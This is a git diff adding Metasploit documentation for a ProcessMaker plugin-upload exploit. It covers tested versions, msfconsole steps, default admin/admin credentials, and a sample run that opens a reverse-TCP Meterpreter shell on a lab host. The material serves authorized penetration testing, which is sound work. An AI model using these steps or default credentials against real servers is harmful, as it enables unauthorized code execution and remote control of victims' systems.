diff --git a/documentation/modules/exploit/multi/http/processmaker_plugin_upload.md b/documentation/modules/exploit/multi/http/processmaker_plugin_upload.md new file mode 100644 index 0000000000..8938c4a03e --- /dev/null +++ b/documentation/modules/exploit/multi/http/processmaker_plugin_upload.md @@ -0,0 +1,88 @@ +## Description + + This module will generate and upload a plugin to ProcessMaker resulting in execution of PHP code as the web server user. + + Credentials for a valid user account with Administrator roles is required to run this module. + + +## Vulnerable Application + + [ProcessMaker](https://www.processmaker.com/) workflow management software allows public and private organizations to automate document intensive, approval-based processes across departments and systems. Business users and process experts with no programming experience can design and run workflows. + + This module has been tested successfully on ProcessMaker versions: + + * 1.6-4276, 2.0.23, 3.0 RC 1, 3.2.0 on Windows 7 SP 1 + * 3.2.0 on Debian Linux 8 + + Source and Installers: + + * [ProcessMaker](https://sourceforge.net/projects/processmaker/files/ProcessMaker/) + + +## Verification Steps + + 1. Start `msfconsole` + 2. Do: `use exploit/multi/http/processmaker_plugin_upload` + 3. Do: `set RHOST [IP]` + 4. Do: `set USERNAME [USERNAME]` (default: `admin`) + 5. Do: `set PASSWORD [PASSWORD]` (default: `admin`) + 6. Do: `set WORKSPACE [WORKSPACE]` (default: `workflow`) + 7. Do: `run` + 8. You should get a session + + +## Options + + **Username** + + The username for a ProcessMaker user with Administrator roles (default: `admin`). + + **Password** + + The password for the ProcessMaker user (default: `admin`). + + The default password for the `admin` user is `admin` on ProcessMaker versions 1.x and 2.x. + + For ProcessMaker 3.x onwards, the default password is specified during installation and cannot be the same as the username. + + However; when creating a new workspace a new user with Administrator roles is also created. The default username and password for the new user are `admin` and `admin` respectively. + + **Workspace** + + The ProcessMaker workspace for which the specified user has Administrator roles. (default: `workflow`) + + +## Scenarios + + ``` + msf > use exploit/multi/http/processmaker_plugin_upload + msf exploit(processmaker_plugin_upload) > set rhost 172.16.191.202 + rhost => 172.16.191.202 + msf exploit(processmaker_plugin_upload) > set username admin + username => admin + msf exploit(processmaker_plugin_upload) > set password admin + password => admin + msf exploit(processmaker_plugin_upload) > set workspace sample + workspace => sample + msf exploit(processmaker_plugin_upload) > set rport 8080 + rport => 8080 + msf exploit(processmaker_plugin_upload) > run + + [*] Started reverse TCP handler on 172.16.191.181:4444 + [*] Authenticating as user 'admin' + [+] 172.16.191.202:8080 Authenticated as user 'admin' + [*] 172.16.191.202:8080 Uploading plugin 'zqkMpDOiIlNEvhkNnV' (23552 bytes) + [*] Sending stage (33986 bytes) to 172.16.191.202 + [*] Meterpreter session 1 opened (172.16.191.181:4444 -> 172.16.191.202:36592) at 2017-06-10 04:21:25 -0400 + [+] Deleted ../../shared/sites/sample/files/input/zqkMpDOiIlNEvhkNnV-.tar + [+] Deleted ../../shared/sites/sample/files/input/zqkMpDOiIlNEvhkNnV.php + [+] Deleted ../../shared/sites/sample/files/input/zqkMpDOiIlNEvhkNnV/class.zqkMpDOiIlNEvhkNnV.php + + meterpreter > getuid + Server username: user (1000) + meterpreter > sysinfo + Computer : debian + OS : Linux debian 3.16.0-4-amd64 #1 SMP Debian 3.16.43-2 (2017-04-30) x86_64 + Meterpreter : php/linux + ``` +